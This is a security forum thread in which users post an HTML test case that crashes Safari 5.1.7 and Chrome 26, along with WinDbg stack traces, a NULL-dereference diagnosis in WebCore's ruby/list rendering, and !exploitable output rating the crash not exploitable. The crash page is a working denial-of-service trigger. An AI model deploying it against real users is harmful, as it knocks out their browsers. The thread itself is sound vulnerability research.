Results 1 to 6 of 6

Thread: Safari 5.1.7 (7534.57.2) and Chrome 26.0.1410.64m Share/Save - My123World.Com!

  1. #1

    Red face Safari 5.1.7 (7534.57.2) and Chrome 26.0.1410.64m

    Following code is for Safari 5.1.7 (7534.57.2) and Chrome 26.0.1410.64m

    Code:
    <html><body>
    
    <li>
    <ruby style="display: block;">
    <t:IMG id="tim"></t:IMG>
    </ruby></li>
    
    </body></html>
    ..."vinnu"
    Last edited by "vinnu"; 06-07-2013 at 12:04 PM.

  2. #2
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    I had some issues resolving chrome symbols, so cdnt do proper analysis.But I dont think there is a possibility of making it exploitable. You should report to vendor and wait a longer time :P before public disclosure :P .

    The villan is " display: block;" for ruby tag.

    PHP Code:
    <html>
    <
    body>


    <
    li>

    <
    ruby style="display: block;" >



    <
    >I am fucked :| by style display block</p>

    </
    ruby>
    </
    li>


    </
    body>
    </
    html

    0:008> g
    (f90.c14): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=02e9f4fc ecx=02e9f568 edx=632476aa esi=02e9f45c edi=02e9f568
    eip=632476de esp=0024e778 ebp=0024e798 iopl=0 nv up ei ng nz ac po cy
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Google\Chrome\Application\27.0.1453.110\chro me.dll -
    chrome_630c0000!ovly_debug_event+0x1678c9:
    632476de 8b400c mov eax,dword ptr [eax+0Ch] ds:0023:0000000c=????????
    0:000> u
    chrome_630c0000!ovly_debug_event+0x1678c9:
    632476de 8b400c mov eax,dword ptr [eax+0Ch]
    632476e1 3bc7 cmp eax,edi
    632476e3 75f5 jne chrome_630c0000!ovly_debug_event+0x1678c5 (632476da)
    632476e5 8b742410 mov esi,dword ptr [esp+10h]
    632476e9 8b4618 mov eax,dword ptr [esi+18h]
    632476ec c1e807 shr eax,7
    632476ef a801 test al,1
    632476f1 0f84b5000000 je chrome_630c0000!ovly_debug_event+0x167997 (632477ac)
    0:000> kb
    ChildEBP RetAddr Args to Child
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0024e798 63247683 02e9f400 02e9f4fc 02e9f4fc chrome_630c0000!ovly_debug_event+0x1678c9
    0024e7b0 63253488 02e9f400 02e9f4fc 02e9f4fc chrome_630c0000!ovly_debug_event+0x16786e
    0024e7c8 63bd8b79 02e9f400 02e9f4fc 02e9f45c chrome_630c0000!ovly_debug_event+0x173673
    0024e7e4 63fa603f 02e9f400 02e9f4fc 02e9f384 chrome_630c0000!ovly_debug_event+0xaf8d64
    0024e800 6358adb9 02e9f400 02e9f4fc 02e9f384 chrome_630c0000!ovly_debug_event+0xec622a
    0024e828 6358ac14 00000000 63288d39 02e9f384 chrome_630c0000!ovly_debug_event+0x4aafa4
    0024e87c 6328776c 02e9f318 00000000 0024e8a8 chrome_630c0000!ovly_debug_event+0x4aadff
    0024e8c8 632848d8 00000001 0024e908 02e9f318 chrome_630c0000!ovly_debug_event+0x1a7957
    0024e970 632842ac 00000001 00000000 02e9f318 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0024e990 63288d39 02e9f318 02e9f1d0 00000001 chrome_630c0000!ovly_debug_event+0x1a4497
    0024e9dc 6328776c 02e9f1d0 00000000 0024ea08 chrome_630c0000!ovly_debug_event+0x1a8f24
    0024ea28 632848d8 00000001 0024ea68 02e9f1d0 chrome_630c0000!ovly_debug_event+0x1a7957
    0024ead0 632842ac 00000001 00000000 02e9f1d0 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0024eaf0 63288d39 02e9f1d0 02e9f010 00000001 chrome_630c0000!ovly_debug_event+0x1a4497
    0024eb3c 6328776c 02e9f010 00000000 0024eb68 chrome_630c0000!ovly_debug_event+0x1a8f24
    0024eb88 632848d8 00000001 0024ebc8 02e9f010 chrome_630c0000!ovly_debug_event+0x1a7957
    0024ec30 632842ac 00000001 00000000 02e9f010 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0024ec50 63283d8d 02e9f010 00000000 01d24680 chrome_630c0000!ovly_debug_event+0x1a4497
    0024ecf8 6328210a 02e97000 01cd8000 02e9f010 chrome_630c0000!ovly_debug_event+0x1a3f78
    0024edbc 63258191 00000001 01cd8040 01cd8000 chrome_630c0000!ovly_debug_event+0x1a22f5
    0:000> u
    chrome_630c0000!ovly_debug_event+0x1678e2:
    632476f7 e81ffafbff call chrome_630c0000!ovly_debug_event+0x127306 (6320711b)
    632476fc 84c0 test al,al
    632476fe 755b jne chrome_630c0000!ovly_debug_event+0x167946 (6324775b)
    63247700 8b742410 mov esi,dword ptr [esp+10h]
    63247704 8b16 mov edx,dword ptr [esi]
    63247706 8b8214010000 mov eax,dword ptr [edx+114h]
    6324770c 8bce mov ecx,esi
    6324770e ffd0 call eax
    0:000> u chrome_630c0000!ovly_debug_event+0x167946
    chrome_630c0000!ovly_debug_event+0x167946:
    6324775b 8b7508 mov esi,dword ptr [ebp+8]
    6324775e 8b4618 mov eax,dword ptr [esi+18h]
    63247761 c1e80a shr eax,0Ah
    63247764 a801 test al,1
    63247766 752f jne chrome_630c0000!ovly_debug_event+0x167982 (63247797)
    63247768 8b4b0c mov ecx,dword ptr [ebx+0Ch]
    6324776b 8b11 mov edx,dword ptr [ecx]
    6324776d 8b421c mov eax,dword ptr [edx+1Ch]
    Hacking Is a Matter of Time Knowledge and Patience

  3. #3
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    0:000> !analyze -v
    FAULTING_IP:
    chrome_630c0000!ovly_debug_event+1678c9
    632476de 8b400c mov eax,dword ptr [eax+0Ch]

    EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
    ExceptionAddress: 632476de (chrome_630c0000!ovly_debug_event+0x001678c9)
    ExceptionCode: c0000005 (Access violation)
    ExceptionFlags: 00000000
    NumberParameters: 2
    Parameter[0]: 00000000
    Parameter[1]: 0000000c
    Attempt to read from address 0000000c

    FAULTING_THREAD: 00000864

    PROCESS_NAME: chrome.exe

    ADDITIONAL_DEBUG_TEXT:
    Use '!findthebuild' command to search for the target build information.
    If the build information is available, run '!findthebuild -s ; .reload' to set symbol path and load symbols.

    FAULTING_MODULE: 77840000 ntdll

    DEBUG_FLR_IMAGE_TIMESTAMP: 51a5663c

    ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

    EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

    EXCEPTION_PARAMETER1: 00000000

    EXCEPTION_PARAMETER2: 0000000c
    READ_ADDRESS: 0000000c

    FOLLOWUP_IP:
    chrome_630c0000!ovly_debug_event+1678c9
    632476de 8b400c mov eax,dword ptr [eax+0Ch]

    BUGCHECK_STR: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_INVAL ID_POINTER_READ_WRONG_SYMBOLS

    PRIMARY_PROBLEM_CLASS: NULL_CLASS_PTR_DEREFERENCE

    DEFAULT_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE

    LAST_CONTROL_TRANSFER: from 63247683 to 632476de

    STACK_TEXT:
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0025e398 63247683 02610400 026104fc 026104fc chrome_630c0000!ovly_debug_event+0x1678c9
    0025e3b0 63253488 02610400 026104fc 026104fc chrome_630c0000!ovly_debug_event+0x16786e
    0025e3c8 63bd8b79 02610400 026104fc 0261045c chrome_630c0000!ovly_debug_event+0x173673
    0025e3e4 63fa603f 02610400 026104fc 02610384 chrome_630c0000!ovly_debug_event+0xaf8d64
    0025e400 6358adb9 02610400 026104fc 02610384 chrome_630c0000!ovly_debug_event+0xec622a
    0025e428 6358ac14 00000000 63288d39 02610384 chrome_630c0000!ovly_debug_event+0x4aafa4
    0025e47c 6328776c 02610318 00000000 0025e4a8 chrome_630c0000!ovly_debug_event+0x4aadff
    0025e4c8 632848d8 00000001 0025e508 02610318 chrome_630c0000!ovly_debug_event+0x1a7957
    0025e570 632842ac 00000001 00000000 02610318 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0025e590 63288d39 02610318 026101d0 00000001 chrome_630c0000!ovly_debug_event+0x1a4497
    0025e5dc 6328776c 026101d0 00000000 0025e608 chrome_630c0000!ovly_debug_event+0x1a8f24
    0025e628 632848d8 00000001 0025e668 026101d0 chrome_630c0000!ovly_debug_event+0x1a7957
    0025e6d0 632842ac 00000001 00000000 026101d0 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0025e6f0 63288d39 026101d0 02610010 00000001 chrome_630c0000!ovly_debug_event+0x1a4497
    0025e73c 6328776c 02610010 00000000 0025e768 chrome_630c0000!ovly_debug_event+0x1a8f24
    0025e788 632848d8 00000001 0025e7c8 02610010 chrome_630c0000!ovly_debug_event+0x1a7957
    0025e830 632842ac 00000001 00000000 02610010 chrome_630c0000!ovly_debug_event+0x1a4ac3
    0025e850 63283d8d 02610010 00000000 00ff4680 chrome_630c0000!ovly_debug_event+0x1a4497
    0025e8f8 6328210a 02601000 00fa8000 02610010 chrome_630c0000!ovly_debug_event+0x1a3f78
    0025e9bc 63258191 00000001 00fa8040 00fa8000 chrome_630c0000!ovly_debug_event+0x1a22f5
    0025e9e8 63257e44 02601000 00000000 0025ea70 chrome_630c0000!ovly_debug_event+0x17837c
    0025e9f8 632579b9 00fa8000 00fa8040 02601000 chrome_630c0000!ovly_debug_event+0x17802f
    0025ea70 63256512 00fa8000 63254376 00fa8000 chrome_630c0000!ovly_debug_event+0x177ba4
    0025eae0 6320fbbd 02626fec 02626fc0 02626fc0 chrome_630c0000!ovly_debug_event+0x1766fd
    0025eaf8 6320f3b0 00fa8000 02bd1e54 00000000 chrome_630c0000!ovly_debug_event+0x12fda8
    0025eb14 6320e095 02bd1e00 02bd1e00 631eecaa chrome_630c0000!ovly_debug_event+0x12f59b
    0025eb30 634239c3 45a1cac1 40bbb356 0025eba4 chrome_630c0000!ovly_debug_event+0x12e280
    0025eb8c 634238ee 02629400 00000001 025d62e0 chrome_630c0000!ovly_debug_event+0x343bae
    0025ebb8 632d9268 00faaf00 00000001 00000000 chrome_630c0000!ovly_debug_event+0x343ad9
    0025ebf0 63423792 00000000 00000001 65087cc0 chrome_630c0000!ovly_debug_event+0x1f9453
    0025ec60 63423681 45a1cac1 40bbb356 0025ec84 chrome_630c0000!ovly_debug_event+0x34397d
    0025ec70 634235f4 025d6490 45a1cac1 40bbb356 chrome_630c0000!ovly_debug_event+0x34386c
    0025ec84 63423532 0257da50 45a1cac1 40bbb356 chrome_630c0000!ovly_debug_event+0x3437df
    0025ed54 63422e41 00000000 00000000 0025edd4 chrome_630c0000!ovly_debug_event+0x34371d
    0025ed88 63422d35 00000001 00000000 00000000 chrome_630c0000!ovly_debug_event+0x34302c
    0025eda4 63422a7d 00fb0780 63422dad 0025edc8 chrome_630c0000!ovly_debug_event+0x342f20
    0025edfc 632cc1f6 02be2bb4 00fb0780 00fb0780 chrome_630c0000!ovly_debug_event+0x342c68
    0025eea4 6316d09a 02be2bb4 00fb8a04 02be2bb4 chrome_630c0000!ovly_debug_event+0x1ec3e1
    0025eec8 6316ce35 02be2bb4 00fcbe10 6563c8d4 chrome_630c0000!ovly_debug_event+0x8d285
    0025ef34 6311c9fc 02be2bb4 0025f4f8 0025f418 chrome_630c0000!ovly_debug_event+0x8d020
    0025ef64 63100bdf 02be2bb4 0025f418 0025f008 chrome_630c0000!ovly_debug_event+0x3cbe7
    0025ef74 630f4259 02be2ba0 0025f418 02be2ba4 chrome_630c0000!ovly_debug_event+0x20dca
    0025f008 630f3c12 0025f418 0025f030 0025f418 chrome_630c0000!ovly_debug_event+0x14444
    0025f158 630f5162 0025f418 0025f1c4 00000000 chrome_630c0000!ovly_debug_event+0x13dfd
    0025f184 630f3818 0025f418 64f53bcc 0025f1c4 chrome_630c0000!ovly_debug_event+0x1534d
    0025f1a8 630f3770 64f9e51c 00000000 0025f1e0 chrome_630c0000!ovly_debug_event+0x13a03
    0025f1b8 63125813 00000000 0025f418 00000000 chrome_630c0000!ovly_debug_event+0x1395b
    0025f1e0 631467b1 00fafe40 00000001 00000000 chrome_630c0000!ovly_debug_event+0x459fe
    0025f594 630d990c 0025f5c8 00fafe10 00000000 chrome_630c0000!ovly_debug_event+0x6699c
    0025f5a8 630d9893 0025f5d8 0025f5c8 0025f63c chrome_630c0000!ChromeMain+0xf2db
    0025f614 630ca95d 008aafd8 008a5030 0025f65c chrome_630c0000!ChromeMain+0xf262
    0025f624 630ca64f 00080000 0025f6ec 0025f63c chrome_630c0000!ChromeMain+0x32c
    0025f65c 000a59d3 00080000 0025f6ec 0025f6f4 chrome_630c0000!ChromeMain+0x1e
    0025f6d4 000a8b6e 00080000 0025f6ec 00000000 chrome+0x259d3
    0025f6f8 000a8bd9 00080000 00000000 003e5920 chrome!SetPrinterInfo+0x76a
    0025f740 000c667d 00080000 00000000 003d1976 chrome!SetPrinterInfo+0x7d5
    0025f7d0 77361174 7ffd5000 0025f81c 7789b3f5 chrome!SetPrinterInfo+0x1e279
    0025f7dc 7789b3f5 7ffd5000 77dfc297 00000000 kernel32!BaseThreadInitThunk+0x12
    0025f81c 7789b3c8 000c66d0 7ffd5000 ffffffff ntdll!RtlInitializeExceptionChain+0x63
    0025f834 00000000 000c66d0 7ffd5000 00000000 ntdll!RtlInitializeExceptionChain+0x36


    SYMBOL_STACK_INDEX: 0

    SYMBOL_NAME: chrome!ovly_debug_event+1678c9

    FOLLOWUP_NAME: MachineOwner

    MODULE_NAME: chrome_630c0000

    IMAGE_NAME: chrome.dll

    STACK_COMMAND: ~0s ; kb

    BUCKET_ID: WRONG_SYMBOLS

    FAILURE_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE_c0000005_chrome.dll!ovl y_debug_event

    WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne...htm?Retriage=1


    0:000> r
    eax=00000000 ebx=026104fc ecx=02610568 edx=632476aa esi=0261045c edi=02610568
    eip=632476de esp=0025e378 ebp=0025e398 iopl=0 nv up ei ng nz ac po cy
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
    chrome_630c0000!ovly_debug_event+0x1678c9:
    632476de 8b400c mov eax,dword ptr [eax+0Ch] ds:0023:0000000c=????????
    Hacking Is a Matter of Time Knowledge and Patience

  4. #4
    You kinda get alot of NULL Pointers with css. This is just one of 'em :-)

    Stack Trace with symbols.
    Code:
    4:064> k
    ChildEBP RetAddr  
    006ae7d8 52df7683 chrome_52c70000!WebCore::RenderBlock::addChildIgnoringAnonymousColumnBlocks+0x34 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 810]
    006ae7f0 52e03488 chrome_52c70000!WebCore::RenderBlock::addChildIgnoringContinuation+0x85 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 949]
    006ae808 53788b79 chrome_52c70000!WebCore::RenderBlock::addChild+0x57 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 941]
    006ae824 53b5603f chrome_52c70000!WebCore::RenderRubyRun::addChild+0x143 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderrubyrun.cpp @ 154]
    006ae840 5313adb9 chrome_52c70000!WebCore::RenderRubyAsBlock::addChild+0x185 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderruby.cpp @ 280]
    006ae868 5313ac14 chrome_52c70000!WebCore::RenderListItem::updateMarkerLocation+0xb3 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderlistitem.cpp @ 268]
    006ae870 52e38d39 chrome_52c70000!WebCore::RenderListItem::layout+0xa [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderlistitem.cpp @ 282]
    006ae8bc 52e3776c chrome_52c70000!WebCore::RenderBlock::layoutBlockChild+0x2e8 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2557]
    006ae908 52e348d8 chrome_52c70000!WebCore::RenderBlock::layoutBlockChildren+0x24f [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2476]
    006ae9b0 52e342ac chrome_52c70000!WebCore::RenderBlock::layoutBlock+0x2c1 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1583]
    006ae9d0 52e38d39 chrome_52c70000!WebCore::RenderBlock::layout+0x39 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1389]
    006aea1c 52e3776c chrome_52c70000!WebCore::RenderBlock::layoutBlockChild+0x2e8 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2557]
    006aea68 52e348d8 chrome_52c70000!WebCore::RenderBlock::layoutBlockChildren+0x24f [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2476]
    006aeb10 52e342ac chrome_52c70000!WebCore::RenderBlock::layoutBlock+0x2c1 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1583]
    006aeb30 52e38d39 chrome_52c70000!WebCore::RenderBlock::layout+0x39 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1389]
    006aeb7c 52e3776c chrome_52c70000!WebCore::RenderBlock::layoutBlockChild+0x2e8 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2557]
    006aebc8 52e348d8 chrome_52c70000!WebCore::RenderBlock::layoutBlockChildren+0x24f [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2476]
    006aec70 52e342ac chrome_52c70000!WebCore::RenderBlock::layoutBlock+0x2c1 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1583]
    006aec90 52e33d8d chrome_52c70000!WebCore::RenderBlock::layout+0x39 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1389]
    006aed38 52e3210a chrome_52c70000!WebCore::RenderView::layout+0x3c8 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\rendering\renderview.cpp @ 276]
    006aedfc 52e08191 chrome_52c70000!WebCore::FrameView::layout+0x782 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\page\frameview.cpp @ 1271]
    006aee28 52e07e44 chrome_52c70000!WebCore::Document::implicitClose+0x348 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\dom\document.cpp @ 2510]
    006aee38 52e079b9 chrome_52c70000!WebCore::FrameLoader::checkCallImplicitClose+0x4e [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\frameloader.cpp @ 837]
    006aeeb0 52e06512 chrome_52c70000!WebCore::FrameLoader::checkCompleted+0x186 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\frameloader.cpp @ 782]
    006aeeb8 52e04376 chrome_52c70000!WebCore::FrameLoader::finishedParsing+0x3d [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\frameloader.cpp @ 715]
    006aef14 52e0400f chrome_52c70000!WebCore::Document::finishedParsing+0xe6 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\dom\document.cpp @ 4496]
    006aef20 52dbfbbd chrome_52c70000!WebCore::HTMLDocumentParser::attemptToRunDeferredScriptsAndEnd+0x10 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 764]
    006aef38 52dbf3b0 chrome_52c70000!WebCore::HTMLDocumentParser::prepareToStopParsing+0x110 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 211]
    006aef54 52dbe095 chrome_52c70000!WebCore::HTMLDocumentParser::finish+0x19a [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\html\parser\htmldocumentparser.cpp @ 828]
    006aef60 52d9ecaa chrome_52c70000!WebCore::DocumentWriter::end+0x4a [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\documentwriter.cpp @ 249]
    006aef70 52fd39c3 chrome_52c70000!WebCore::DocumentLoader::finishedLoading+0x128 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\documentloader.cpp @ 403]
    006aefcc 52fd38ee chrome_52c70000!WebCore::DocumentLoader::notifyFinished+0x3f [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\documentloader.cpp @ 354]
    006aeff8 52e89268 chrome_52c70000!WebCore::CachedResource::checkNotify+0x3a [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\cache\cachedresource.cpp @ 379]
    006af030 52fd3792 chrome_52c70000!WebCore::CachedRawResource::data+0x15a [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\cache\cachedrawresource.cpp @ 72]
    006af098 52fd3681 chrome_52c70000!WebCore::SubresourceLoader::didFinishLoading+0x97 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\subresourceloader.cpp @ 291]
    006af0a8 52fd35f4 chrome_52c70000!WebCore::ResourceLoader::didFinishLoading+0x13 [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\loader\resourceloader.cpp @ 501]
    006af0bc 52fd3532 chrome_52c70000!WebCore::ResourceHandleInternal::didFinishLoading+0x3d [c:\b\build\slave\win\build\src\third_party\webkit\source\webcore\platform\network\chromium\resourcehandle.cpp @ 166]
    006af18c 52fd2e41 chrome_52c70000!webkit_glue::WebURLLoaderImpl::Context::OnCompletedRequest+0x147 [c:\b\build\slave\win\build\src\webkit\glue\weburlloader_impl.cc @ 721]
    006af1c0 52fd2d35 chrome_52c70000!content::ResourceDispatcher::OnRequestComplete+0x94 [c:\b\build\slave\win\build\src\content\common\resource_dispatcher.cc @ 502]
    006af1dc 52fd2a7d chrome_52c70000!DispatchToMethod<content::ResourceDispatcher,void (__thiscall content::ResourceDispatcher::*)(int,int,bool,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &,base::TimeTicks const &),int,int,bool,std::basic_string<char,std::char_traits<char>,std::allocator<char> >,base::TimeTicks>+0x1e [c:\b\build\slave\win\build\src\base\tuple.h @ 572]
    006af234 52e7c1f6 chrome_52c70000!ResourceMsg_RequestComplete::Dispatch<content::ResourceDispatcher,content::ResourceDispatcher,void (__thiscall content::ResourceDispatcher::*)(int,int,bool,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &,base::TimeTicks const &)>+0x4c [c:\b\build\slave\win\build\src\content\common\resource_messages.h @ 261]
    006af2dc 52d1d09a chrome_52c70000!content::ResourceDispatcher::DispatchMessageW+0x1ad [c:\b\build\slave\win\build\src\content\common\resource_dispatcher.cc @ 601]
    006af300 52d1ce35 chrome_52c70000!content::ResourceDispatcher::OnMessageReceived+0xa6 [c:\b\build\slave\win\build\src\content\common\resource_dispatcher.cc @ 293]
    006af36c 52ccc9fc chrome_52c70000!content::ChildThread::OnMessageReceived+0x1c [c:\b\build\slave\win\build\src\content\common\child_thread.cc @ 241]
    006af39c 52cb0bdf chrome_52c70000!IPC::ChannelProxy::Context::OnDispatchMessage+0x93 [c:\b\build\slave\win\build\src\ipc\ipc_channel_proxy.cc @ 267]
    006af3ac 52ca4259 chrome_52c70000!base::internal::Invoker<2,base::internal::BindState<base::internal::RunnableAdapter<void (__thiscall browser_sync::SyncBackendHost::Core::*)(std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &)>,void __cdecl(browser_sync::SyncBackendHost::Core *,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &),void __cdecl(browser_sync::SyncBackendHost::Core *,std::basic_string<char,std::char_traits<char>,std::allocator<char> >)>,void __cdecl(browser_sync::SyncBackendHost::Core *,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &)>::Run+0x16 [c:\b\build\slave\win\build\src\base\bind_internal.h @ 1257]
    006af440 52ca3c12 chrome_52c70000!MessageLoop::RunTask+0x341 [c:\b\build\slave\win\build\src\base\message_loop.cc @ 478]
    006af590 52ca5162 chrome_52c70000!MessageLoop::DoWork+0x2ec [c:\b\build\slave\win\build\src\base\message_loop.cc @ 672]
    006af5bc 52ca3818 chrome_52c70000!base::MessagePumpDefault::Run+0xc1 [c:\b\build\slave\win\build\src\base\message_pump_default.cc @ 30]
    [snip] (because of post length restriction)

  5. #5
    Garage Addict 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Location
    Pune
    Posts
    338
    Blog Entries
    3
    Reported same bug 1month back...

  6. #6
    In safari 5.1.7 it isn't exploitable

    Code:
    Access violation - code c0000005 (!!! second chance !!!)
    eax=00000000 ebx=7fb0498c ecx=7fb04a08 edx=69327140 esi=00000000 edi=7fb04a08
    eip=69327172 esp=002dec8c ebp=7fb0498c iopl=0         nv up ei ng nz ac po cy
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010293
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Safari\Apple Application Support\WebKit.dll - 
    WebKit!WKOpenPanelResultListenerGetTypeID+0x643d2:
    69327172 8b460c          mov     eax,dword ptr [esi+0Ch] ds:0023:0000000c=????????
    0:000> !load msec.dll
    0:000> !exploitable -m
    VERSION:1.6.0.0
    IDENTITY:HostMachine\HostUser
    PROCESSOR:X86
    CLASS:USER
    QUALIFIER:USER_PROCESS
    EVENT:DEBUG_EVENT_EXCEPTION
    EXCEPTION_FAULTING_ADDRESS:0xc
    EXCEPTION_CODE:0xC0000005
    EXCEPTION_LEVEL:SECOND_CHANCE
    EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION
    EXCEPTION_SUBTYPE:READ
    FAULTING_INSTRUCTION:69327172 mov eax,dword ptr [esi+0ch]
    BASIC_BLOCK_INSTRUCTION_COUNT:3
    BASIC_BLOCK_INSTRUCTION:69327172 mov eax,dword ptr [esi+0ch]
    BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:esi
    BASIC_BLOCK_INSTRUCTION:69327175 cmp eax,edi
    BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:eax
    BASIC_BLOCK_INSTRUCTION:69327177 jne webkit!wkopenpanelresultlistenergettypeid+0x643d0 (69327170)
    BASIC_BLOCK_INSTRUCTION_TAINTED_INPUT_OPERAND:ZeroFlag
    MAJOR_HASH:0xf6e17282
    MINOR_HASH:0x044732ce
    STACK_DEPTH:8
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0x643d2
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0x6479d
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0x646f8
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0xbc475
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0xbbe81
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0xac3dc
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0xac428
    STACK_FRAME:WebKit!WKOpenPanelResultListenerGetTypeID+0x67226
    INSTRUCTION_ADDRESS:0x0000000069327172
    INVOKING_STACK_FRAME:0
    DESCRIPTION:Read Access Violation near NULL
    SHORT_DESCRIPTION:ReadAVNearNull
    CLASSIFICATION:PROBABLY_NOT_EXPLOITABLE
    BUG_TITLE:Read Access Violation near NULL starting at WebKit!WKOpenPanelResultListenerGetTypeID+0x00000000000643d2 (Hash=0xf6e17282.0x044732ce)
    EXPLANATION:This is a user mode read access violation near null, and is probably not exploitable.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •